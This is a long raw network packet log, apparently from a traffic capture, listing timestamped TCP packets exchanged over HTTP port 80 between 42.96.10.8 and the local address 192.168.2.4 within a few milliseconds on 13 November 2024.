                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823611975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823645115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823690891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823707104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823721886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823738098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823751926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823755026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823798895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823798895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823849916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823875904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823889971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823904991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823919058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823921919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823940039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823940992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823956013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823976040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824017048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824031115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824045897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824059963 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824062109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824079037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824085951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824095011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824110031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824111938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824157000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824162006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824187994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824203014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824217081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824232101 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824232101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824249983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824265003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824265003 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824281931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824291945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824300051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824325085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824335098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824341059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824357033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824371099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824373007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824387074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824388027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824418068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824420929 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824435949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824451923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824466944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824481964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824486971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824497938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824511051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824515104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824527025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824533939 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824542999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.824574947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825164080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825180054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825193882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825208902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825208902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825225115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825234890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825249910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825265884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825272083 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825280905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825297117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825309992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825314045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825331926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825336933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825366974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825367928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825385094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825400114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825414896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825428963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825431108 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825445890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825454950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825460911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825476885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825479031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825493097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825508118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825520039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825535059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825551033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825566053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825570107 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825575113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825589895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825599909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825607061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825608015 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825634956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825644016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825660944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825678110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825692892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825695038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825709105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825725079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825730085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825742006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825757027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825763941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825773001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825786114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825788021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825807095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825822115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825836897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825849056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825854063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825861931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825870991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825885057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825886965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825902939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825918913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825920105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825934887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825948954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825951099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825968027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825982094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.825999022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826013088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826013088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826020002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826039076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826052904 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826056004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826091051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826107979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826117039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826122999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826138973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826153994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826153994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826169968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826179981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826186895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826203108 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826204062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826220036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826235056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826236963 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826250076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826265097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826265097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826308966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826323986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826339006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826339960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826356888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826356888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826374054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826387882 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826415062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826432943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826452017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826458931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826474905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826492071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826494932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826508045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826524019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826536894 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826559067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826571941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826596975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826611996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826627016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826637030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826642990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826658010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826668024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826673031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826688051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826697111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826702118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826718092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826723099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826735020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826752901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826757908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826767921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826783895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826783895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826797009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826812983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826818943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826829910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826844931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826848984 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826869965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826884031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826885939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826904058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826917887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826931953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826935053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826948881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826965094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826965094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826972961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826987982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.826998949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827012062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827013969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827033997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827049017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827064991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827069044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827080011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827092886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827095985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827111959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827112913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827130079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827145100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827166080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827188969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827353001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827368975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827383041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827399969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827403069 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827425003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827438116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827440023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827454090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827469110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827470064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827486038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827500105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827501059 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827517033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827533007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827548981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.827596903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.828735113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.828816891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.828830004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.828844070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.828861952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.828866959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.828888893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.828891039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.828908920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.828922033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.828933954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.828948975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.828962088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.828974962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.828986883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.828999996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829004049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829019070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829034090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829040051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829072952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829073906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829088926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829114914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829134941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829139948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829158068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829170942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829185009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829188108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829210997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829262018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829277992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829293013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829308033 CET804973342.96.10.8192.168.2.4
